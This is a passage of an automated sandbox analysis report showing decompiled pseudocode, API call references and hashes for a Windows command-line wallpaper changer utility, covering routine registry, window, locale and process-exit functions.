							E0041B0D0(_t118, _v8, _v16);
						}
					} else {
						 *(_t118 + 0x18) = 0x20009;
						if(((_t70 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
							_push( *((intOrPtr*)(_t118 + 0x10)));
							_push(E0041B3E0);
							_push(_v8);
							E0040449C();
						}
						E0041B0D0(_t118, _v8, _v16);
					}
				} else {
					 *(_t118 + 0x18) = 0x20019;
					if(((_t64 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
						_push( *((intOrPtr*)(_t118 + 0x10)));
						_push(E0041B3E0);
						_push(_v8);
						E0040449C();
					}
					E0041B0D0(_t118, _v8, _v16);
				}
				_pop(_t109);
				 *[fs:eax] = _t109;
				_push(E0041B3CD);
				return E0040411C( &_v8);
			}
















                                  0x0041b236
                                  0x0041b23b
                                  0x0041b23f
                                  0x0041b240
                                  0x0041b245
                                  0x0041b248
                                  0x0041b250
                                  0x0041b25d
                                  0x0041b261
                                  0x0041b270
                                  0x0041b270
                                  0x0041b277
                                  0x0041b288
                                  0x0041b298
                                  0x0041b29f
                                  0x0041b2a7
                                  0x0041b2f3
                                  0x0041b303
                                  0x0041b30a
                                  0x0041b312
                                  0x0041b358
                                  0x0041b368
                                  0x0041b36f
                                  0x0041b377
                                  0x0041b379
                                  0x0041b389
                                  0x0041b38b
                                  0x0041b38e
                                  0x0041b393
                                  0x0041b39e
                                  0x0041b39e
                                  0x0041b3ab
                                  0x0041b3ab
                                  0x0041b314
                                  0x0041b314
                                  0x0041b324
                                  0x0041b326
                                  0x0041b329
                                  0x0041b32e
                                  0x0041b339
                                  0x0041b339
                                  0x0041b346
                                  0x0041b346
                                  0x0041b2a9
                                  0x0041b2a9
                                  0x0041b2b9
                                  0x0041b2bb
                                  0x0041b2be
                                  0x0041b2c3
                                  0x0041b2ce
                                  0x0041b2ce
                                  0x0041b2db
                                  0x0041b2db
                                  0x0041b3b2
                                  0x0041b3b5
                                  0x0041b3b8
                                  0x0041b3c5

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,0041B3C6), ref: 0041B298
                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,0041B3C6), ref: 0041B303
                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 0041B368
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: cc7bb251413e2d7370e4f07b8def1cf3fc546229712c83989b59146fa39c66a7
                                  • Instruction ID: d8457b7cfc01845025ff0f1481e631499ec3f4561d4f15b9316b41f804d9865f
                                  • Opcode Fuzzy Hash: cc7bb251413e2d7370e4f07b8def1cf3fc546229712c83989b59146fa39c66a7
                                  • Instruction Fuzzy Hash: 9E418070A0020CABDB11DBA1C952BDEB7F9EF48708F10447AA914A7282DB799F559788
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00455280, Relevance: 4.6, APIs: 3, Instructions: 69COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00455280(void* __eax, void* __edx) {
				int _t18;
				int _t20;
				void* _t34;
				void* _t36;
				void* _t38;

				_t34 = __eax;
				_t18 =  *0x470b40; // 0x0
				if( *((intOrPtr*)(_t18 + 0x30)) != 0) {
					if(__edx == 0) {
						if( *((intOrPtr*)(__eax + 0x9c)) != 0) {
							L6:
							 *((intOrPtr*)(_t34 + 0x9c)) =  *((intOrPtr*)(_t34 + 0x9c)) + 1;
							return _t18;
						}
						EnumWindows(E00455210, 0);
						_t3 = _t34 + 0x98; // 0x0
						_t18 =  *( *_t3 + 8);
						if(_t18 <= 0) {
							goto L6;
						}
						_t38 = _t18 - 1;
						if(_t38 < 0) {
							goto L6;
						} else {
							goto L5;
						}
						do {
							L5:
							asm("cmc");
							asm("sbb eax, eax");
							_t5 = _t34 + 0x98; // 0x0
							_t18 = ShowOwnedPopups(E00413D2C( *_t5, _t38), _t18);
							_t38 = _t38 - 1;
						} while (_t38 != 0xffffffff);
						goto L6;
					}
					if( *((intOrPtr*)(__eax + 0x9c)) > 0) {
						 *((intOrPtr*)(__eax + 0x9c)) =  *((intOrPtr*)(__eax + 0x9c)) - 1;
						if( *((intOrPtr*)(__eax + 0x9c)) == 0) {
							_t12 = _t34 + 0x98; // 0x0
							_t20 =  *( *_t12 + 8);
							if(_t20 <= 0) {
								L12:
								_t15 = _t34 + 0x98; // 0x0
								return  *((intOrPtr*)( *((intOrPtr*)( *_t15)) + 8))();
							}
							_t36 = _t20 - 1;
							if(_t36 < 0) {
								goto L12;
							} else {
								goto L11;
							}
							do {
								L11:
								asm("cmc");
								asm("sbb eax, eax");
								_t14 = _t34 + 0x98; // 0x0
								_t20 = ShowOwnedPopups(E00413D2C( *_t14, _t36), _t20);
								_t36 = _t36 - 1;
							} while (_t36 != 0xffffffff);
							goto L12;
						}
					}
				}
				return _t18;
			}








                                  0x00455285
                                  0x00455287
                                  0x00455290
                                  0x00455298
                                  0x004552a1
                                  0x004552e4
                                  0x004552e4
                                  0x00000000
                                  0x004552e4
                                  0x004552aa
                                  0x004552af
                                  0x004552b5
                                  0x004552ba
                                  0x00000000
                                  0x00000000
                                  0x004552be
                                  0x004552c2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004552c4
                                  0x004552c4
                                  0x004552c7
                                  0x004552c8
                                  0x004552cd
                                  0x004552d9
                                  0x004552de
                                  0x004552df
                                  0x00000000
                                  0x004552c4
                                  0x004552f3
                                  0x004552f5
                                  0x00455302
                                  0x00455304
                                  0x0045530a
                                  0x0045530f
                                  0x00455339
                                  0x00455339
                                  0x00000000
                                  0x00455341
                                  0x00455313
                                  0x00455317
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00455319
                                  0x00455319
                                  0x0045531c
                                  0x0045531d
                                  0x00455322
                                  0x0045532e
                                  0x00455333
                                  0x00455334
                                  0x00000000
                                  0x00455319
                                  0x00455302
                                  0x004552f3
                                  0x00455347

                                  APIs
                                  • EnumWindows.USER32(00455210,00000000), ref: 004552AA
                                  • ShowOwnedPopups.USER32(00000000,?,00455210,00000000,?,?,0046D588,00455C19,61572065,61572065,?,00456460), ref: 004552D9
                                  • ShowOwnedPopups.USER32(00000000,?,?,?,0046D588,00455C19,61572065,61572065,?,00456460), ref: 0045532E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: OwnedPopupsShow$EnumWindows
                                  • String ID:
                                  • API String ID: 2480833221-0
                                  • Opcode ID: 2def97d80cd3fd5cf14bd8411b48f3a52973277e93ca50c5574ee215c9a1795f
                                  • Instruction ID: d497bf893ac0bc5066ebfb868d005e13283c7ee60e91fbd506b006b56cc35223
                                  • Opcode Fuzzy Hash: 2def97d80cd3fd5cf14bd8411b48f3a52973277e93ca50c5574ee215c9a1795f
                                  • Instruction Fuzzy Hash: 4921C330B10900DBE710AA79C454BB2F3D4BB0536AF014273EC1CD7293D778AC888B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C6B8, Relevance: 4.6, APIs: 3, Instructions: 56threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040C6B8() {
				signed short _t13;
				int _t17;
				signed int _t21;
				signed int _t22;
				void* _t34;
				void* _t35;

				 *0x470744 = 0x409;
				 *0x00470748 = 9;
				 *0x0047074C = 1;
				_t13 = GetThreadLocale();
				if(_t13 != 0) {
					 *0x470744 = _t13;
				}
				if(_t13 != 0) {
					 *0x00470748 = _t13 & 0x3ff;
					 *0x0047074C = (_t13 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x46e10c, 0x40c75c, 8 << 2);
				_t34 = 0x470744;
				if( *0x46e0c8 <= 4 ||  *0x46e0c4 != 2) {
					 *((char*)(_t34 + 0xd)) = GetSystemMetrics(0x4a) & 0xffffff00 | _t15 != 0x00000000;
				} else {
					 *0x0040C769 = 1;
				}
				_t17 = GetSystemMetrics(0x2a); // executed
				_t22 = _t21 & 0xffffff00 | _t17 != 0x00000000;
				 *(_t34 + 0xc) = _t22;
				if(_t22 != 0) {
					return E0040C65C(_t35);
				}
				return _t17;
			}









                                  0x0040c6c6
                                  0x0040c6cc
                                  0x0040c6d3
                                  0x0040c6da
                                  0x0040c6e1
                                  0x0040c6e3
                                  0x0040c6e3
                                  0x0040c6e8
                                  0x0040c6f4
                                  0x0040c6fd
                                  0x0040c6fd
                                  0x0040c710
                                  0x0040c712
                                  0x0040c71a
                                  0x0040c737
                                  0x0040c725
                                  0x0040c725
                                  0x0040c725
                                  0x0040c73c
                                  0x0040c743
                                  0x0040c746
                                  0x0040c74b
                                  0x00000000
                                  0x0040c753
                                  0x0040c75a

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$LocaleThread
                                  • String ID:
                                  • API String ID: 2159509485-0
                                  • Opcode ID: 73e21735d2d470ef33b083651008ddfbeeade792b83ec37465bb7a41fe3d4666
                                  • Instruction ID: 25bc861dfbb162038f8d57caf5f88a7b27439012bb2620b58017c3d598e623a1
                                  • Opcode Fuzzy Hash: 73e21735d2d470ef33b083651008ddfbeeade792b83ec37465bb7a41fe3d4666
                                  • Instruction Fuzzy Hash: E8014874601762CAD3206B27984136377C89B01328F14C53FD8CA973C2EBBD9841C7AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041B3E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E0041B3E0(intOrPtr* __eax, signed int __ebx, char* __ecx, void* __edx, void* __fp0) {
				long _t16;
				intOrPtr* _t32;
				char* _t35;
				intOrPtr* _t37;

				_pop(_t37);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__ebx + 0x56)) =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
				_push(__ebx);
				_push(__ecx);
				_t35 = __ecx;
				_t32 = __eax;
				E00402D4C(__ecx, 8);
				_t16 = RegQueryValueExA( *(_t32 + 4), E004045DC(__edx), 0, _t37 + 8, 0, _t35 + 4); // executed
				 *_t35 = E0041AFDC( *_t37);
				return __ebx & 0xffffff00 | _t16 == 0x00000000;
			}







                                  0x0041b3e0
                                  0x0041b3e1
                                  0x0041b3e3
                                  0x0041b3e4
                                  0x0041b3e8
                                  0x0041b3e9
                                  0x0041b3ed
                                  0x0041b3f8
                                  0x0041b416
                                  0x0041b428
                                  0x0041b432

                                  APIs
                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,0041B448), ref: 0041B416
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID: MS Shell Dlg 2
                                  • API String ID: 3660427363-3198668166
                                  • Opcode ID: ed845f8dcf90eb0cc11f9e84d8f7677c97b06d6a29b17cecb4727d57062212db
                                  • Instruction ID: aefe155333a5f554399655cdce492367360bfc68df5fac8bae1159c4d8749238
                                  • Opcode Fuzzy Hash: ed845f8dcf90eb0cc11f9e84d8f7677c97b06d6a29b17cecb4727d57062212db
                                  • Instruction Fuzzy Hash: BBF0827234D2446FD705EAAD9C41BAB7B9C9BC5310F04407FF548CB582DA24CD09836A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041B3E4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0041B3E4(void* __eax, char* __ecx, void* __edx, void* __fp0) {
				long _t14;
				signed int _t18;
				void* _t26;
				char* _t27;
				intOrPtr* _t28;

				_push(__ecx);
				_t27 = __ecx;
				_t26 = __eax;
				E00402D4C(__ecx, 8);
				_t14 = RegQueryValueExA( *(_t26 + 4), E004045DC(__edx), 0, _t28 + 8, 0, _t27 + 4); // executed
				 *_t27 = E0041AFDC( *_t28);
				return _t18 & 0xffffff00 | _t14 == 0x00000000;
			}








                                  0x0041b3e8
                                  0x0041b3e9
                                  0x0041b3ed
                                  0x0041b3f8
                                  0x0041b416
                                  0x0041b428
                                  0x0041b432

                                  APIs
                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,0041B448), ref: 0041B416
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID: MS Shell Dlg 2
                                  • API String ID: 3660427363-3198668166
                                  • Opcode ID: 2da5db203743ed54820ef3ee7726ef91f0ab6d4267825aece351203e893c3290
                                  • Instruction ID: 97723ca3acc37bd935a7c2b7deee96411dc323b6a488666b4662ccd014304408
                                  • Opcode Fuzzy Hash: 2da5db203743ed54820ef3ee7726ef91f0ab6d4267825aece351203e893c3290
                                  • Instruction Fuzzy Hash: 9FF01C723491086BD614EAAA9D41FAB779CDB85354F00803AF648CB282DA25DD058765
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402110, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00401A1C: RtlInitializeCriticalSection.KERNEL32(004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A32
                                    • Part of subcall function 00401A1C: RtlEnterCriticalSection.KERNEL32(004705C8,004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A45
                                    • Part of subcall function 00401A1C: LocalAlloc.KERNEL32(00000000,00000FF8,004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A6F
                                    • Part of subcall function 00401A1C: RtlLeaveCriticalSection.KERNEL32(004705C8,00401AD9,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401ACC
                                  • RtlEnterCriticalSection.KERNEL32(004705C8,00000000,0040228C), ref: 0040215B
                                  • RtlLeaveCriticalSection.KERNEL32(004705C8,00402293), ref: 00402286
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                  • String ID:
                                  • API String ID: 2227675388-0
                                  • Opcode ID: a18e85b430b85e59c87229bf541772c929af1a8cfe70f22bcb04cc32c194dd05
                                  • Instruction ID: 154c07d58550e4a9f7b7a054e7c0f7fc40a85cc97c5f19c7892ccd633171cae9
                                  • Opcode Fuzzy Hash: a18e85b430b85e59c87229bf541772c929af1a8cfe70f22bcb04cc32c194dd05
                                  • Instruction Fuzzy Hash: D84106B1A02305DFE714CF68EE9562A77A1F789314B2441BFD408E77E1D678A981CB4C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404028, Relevance: 3.1, APIs: 2, Instructions: 68COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00404028() {
				int _t18;
				void* _t32;
				struct HINSTANCE__* _t41;
				intOrPtr _t43;
				void* _t44;

				if( *0x0047065C != 0 ||  *0x470044 == 0) {
					L3:
					if( *0x46e004 != 0) {
						E00403F08();
						E00403F9C(_t32);
						 *0x46e004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x47065c)) == 2 &&  *0x46e000 == 0) {
							 *0x00470640 = 0;
						}
						E00403DB0(); // executed
						if( *((char*)(0x47065c)) <= 1 ||  *0x46e000 != 0) {
							_t36 =  *0x00470644;
							if( *0x00470644 != 0) {
								E00405744(_t36);
								_t43 =  *((intOrPtr*)(0x470644));
								_t7 = _t43 + 0x10; // 0x400000
								_t41 =  *_t7;
								_t8 = _t43 + 4; // 0x400000
								if(_t41 !=  *_t8 && _t41 != 0) {
									FreeLibrary(_t41);
								}
							}
						}
						E00403D88();
						if( *((char*)(0x47065c)) == 1) {
							 *0x00470658();
						}
						if( *((char*)(0x47065c)) != 0) {
							E00403F6C();
						}
						if( *0x470634 == 0) {
							if( *0x470024 != 0) {
								 *0x470024();
							}
							_t18 =  *0x46e000; // 0x0
							ExitProcess(_t18); // executed
						}
						memcpy(0x470634,  *0x470634, 0xb << 2);
						_t44 = _t44 + 0xc;
					}
				} else {
					do {
						 *0x470044 = 0;
						 *((intOrPtr*)( *0x470044))();
					} while ( *0x470044 != 0);
					goto L3;
				}
			}








                                  0x0040403a
                                  0x00404050
                                  0x00404057
                                  0x00404059
                                  0x0040405e
                                  0x00404065
                                  0x00404065
                                  0x00000000
                                  0x0040406a
                                  0x0040406e
                                  0x0040407b
                                  0x0040407b
                                  0x0040407e
                                  0x00404087
                                  0x00404092
                                  0x00404097
                                  0x0040409b
                                  0x004040a0
                                  0x004040a3
                                  0x004040a3
                                  0x004040a6
                                  0x004040a9
                                  0x004040b0
                                  0x004040b0
                                  0x004040a9
                                  0x00404097
                                  0x004040b5
                                  0x004040be
                                  0x004040c0
                                  0x004040c0
                                  0x004040c7
                                  0x004040c9
                                  0x004040c9
                                  0x004040d1
                                  0x004040da
                                  0x004040dc
                                  0x004040dc
                                  0x004040e2
                                  0x004040e8
                                  0x004040e8
                                  0x004040f8
                                  0x004040f8
                                  0x004040f8
                                  0x00404041
                                  0x00404041
                                  0x00404047
                                  0x00404049
                                  0x0040404b
                                  0x00000000
                                  0x00404041

                                  APIs
                                  • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040B0
                                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040E8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ExitFreeLibraryProcess
                                  • String ID:
                                  • API String ID: 1404682716-0
                                  • Opcode ID: 12af02ec4315c38aa48986513f99f52d4ebe9cd618b56ac68f6f9c03ed3c242c
                                  • Instruction ID: d0f3875a72f99f463ae980fa8ec6b1d0a322450470e2545c1aa00f9e293a7eda
                                  • Opcode Fuzzy Hash: 12af02ec4315c38aa48986513f99f52d4ebe9cd618b56ac68f6f9c03ed3c242c
                                  • Instruction Fuzzy Hash: 71215CB09012509BDB21AF3588483573BE5AB85318F1545BBDB04B73D6D7BC9C80CB8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404020, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00404020() {
				intOrPtr* _t13;
				int _t21;
				void* _t36;
				struct HINSTANCE__* _t47;
				intOrPtr _t50;
				void* _t51;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0047065C != 0 ||  *0x470044 == 0) {
					L5:
					if( *0x46e004 != 0) {
						E00403F08();
						E00403F9C(_t36);
						 *0x46e004 = 0;
					}
					L7:
					if( *((char*)(0x47065c)) == 2 &&  *0x46e000 == 0) {
						 *0x00470640 = 0;
					}
					E00403DB0(); // executed
					if( *((char*)(0x47065c)) <= 1 ||  *0x46e000 != 0) {
						_t41 =  *0x00470644;
						if( *0x00470644 != 0) {
							E00405744(_t41);
							_t50 =  *((intOrPtr*)(0x470644));
							_t7 = _t50 + 0x10; // 0x400000
							_t47 =  *_t7;
							_t8 = _t50 + 4; // 0x400000
							if(_t47 !=  *_t8 && _t47 != 0) {
								FreeLibrary(_t47);
							}
						}
					}
					E00403D88();
					if( *((char*)(0x47065c)) == 1) {
						 *0x00470658();
					}
					if( *((char*)(0x47065c)) != 0) {
						E00403F6C();
					}
					if( *0x470634 == 0) {
						if( *0x470024 != 0) {
							 *0x470024();
						}
						_t21 =  *0x46e000; // 0x0
						ExitProcess(_t21); // executed
					}
					memcpy(0x470634,  *0x470634, 0xb << 2);
					_t51 = _t51 + 0xc;
					goto L7;
				} else {
					do {
						 *0x470044 = 0;
						 *((intOrPtr*)( *0x470044))();
					} while ( *0x470044 != 0);
					goto L5;
				}
			}









                                  0x00404022
                                  0x0040403a
                                  0x00404050
                                  0x00404057
                                  0x00404059
                                  0x0040405e
                                  0x00404065
                                  0x00404065
                                  0x0040406a
                                  0x0040406e
                                  0x0040407b
                                  0x0040407b
                                  0x0040407e
                                  0x00404087
                                  0x00404092
                                  0x00404097
                                  0x0040409b
                                  0x004040a0
                                  0x004040a3
                                  0x004040a3
                                  0x004040a6
                                  0x004040a9
                                  0x004040b0
                                  0x004040b0
                                  0x004040a9
                                  0x00404097
                                  0x004040b5
                                  0x004040be
                                  0x004040c0
                                  0x004040c0
                                  0x004040c7
                                  0x004040c9
                                  0x004040c9
                                  0x004040d1
                                  0x004040da
                                  0x004040dc
                                  0x004040dc
                                  0x004040e2
                                  0x004040e8
                                  0x004040e8
                                  0x004040f8
                                  0x004040f8
                                  0x00000000
                                  0x00404041
                                  0x00404041
                                  0x00404047
                                  0x00404049
                                  0x0040404b
                                  0x00000000
                                  0x00404041

                                  APIs
                                  • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040B0
                                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040E8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ExitFreeLibraryProcess
                                  • String ID:
                                  • API String ID: 1404682716-0
                                  • Opcode ID: 21171fad3894dd2f994fd8b975ce1c4a1e45cc821d61df0cd9bec43aafbacf17
                                  • Instruction ID: f84a6c8b7f14e96f86cc387e9a4454369665147cdd85f1117466e152b3cc321e
                                  • Opcode Fuzzy Hash: 21171fad3894dd2f994fd8b975ce1c4a1e45cc821d61df0cd9bec43aafbacf17
                                  • Instruction Fuzzy Hash: 44216DB08012909FDB21AF7588483563BE0AF85318F1545BBEB04772D6D7BC9C80CB9E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404024, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00404024() {
				int _t20;
				void* _t35;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				void* _t50;

				if( *0x0047065C != 0 ||  *0x470044 == 0) {
					L4:
					if( *0x46e004 != 0) {
						E00403F08();
						E00403F9C(_t35);
						 *0x46e004 = 0;
					}
					L6:
					if( *((char*)(0x47065c)) == 2 &&  *0x46e000 == 0) {
						 *0x00470640 = 0;
					}
					E00403DB0(); // executed
					if( *((char*)(0x47065c)) <= 1 ||  *0x46e000 != 0) {
						_t40 =  *0x00470644;
						if( *0x00470644 != 0) {
							E00405744(_t40);
							_t49 =  *((intOrPtr*)(0x470644));
							_t7 = _t49 + 0x10; // 0x400000
							_t46 =  *_t7;
							_t8 = _t49 + 4; // 0x400000
							if(_t46 !=  *_t8 && _t46 != 0) {
								FreeLibrary(_t46);
							}
						}
					}
					E00403D88();
					if( *((char*)(0x47065c)) == 1) {
						 *0x00470658();
					}
					if( *((char*)(0x47065c)) != 0) {
						E00403F6C();
					}
					if( *0x470634 == 0) {
						if( *0x470024 != 0) {
							 *0x470024();
						}
						_t20 =  *0x46e000; // 0x0
						ExitProcess(_t20); // executed
					}
					memcpy(0x470634,  *0x470634, 0xb << 2);
					_t50 = _t50 + 0xc;
					goto L6;
				} else {
					do {
						 *0x470044 = 0;
						 *((intOrPtr*)( *0x470044))();
					} while ( *0x470044 != 0);
					goto L4;
				}
			}








                                  0x0040403a
                                  0x00404050
                                  0x00404057
                                  0x00404059
                                  0x0040405e
                                  0x00404065
                                  0x00404065
                                  0x0040406a
                                  0x0040406e
                                  0x0040407b
                                  0x0040407b
                                  0x0040407e
                                  0x00404087
                                  0x00404092
                                  0x00404097
                                  0x0040409b
                                  0x004040a0
                                  0x004040a3
                                  0x004040a3
                                  0x004040a6
                                  0x004040a9
                                  0x004040b0
                                  0x004040b0
                                  0x004040a9
                                  0x00404097
                                  0x004040b5
                                  0x004040be
                                  0x004040c0
                                  0x004040c0
                                  0x004040c7
                                  0x004040c9
                                  0x004040c9
                                  0x004040d1
                                  0x004040da
                                  0x004040dc
                                  0x004040dc
                                  0x004040e2
                                  0x004040e8
                                  0x004040e8
                                  0x004040f8
                                  0x004040f8
                                  0x00000000
                                  0x00404041
                                  0x00404041
                                  0x00404047
                                  0x00404049
                                  0x0040404b
                                  0x00000000
                                  0x00404041

                                  APIs
                                  • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040B0
                                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040E8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
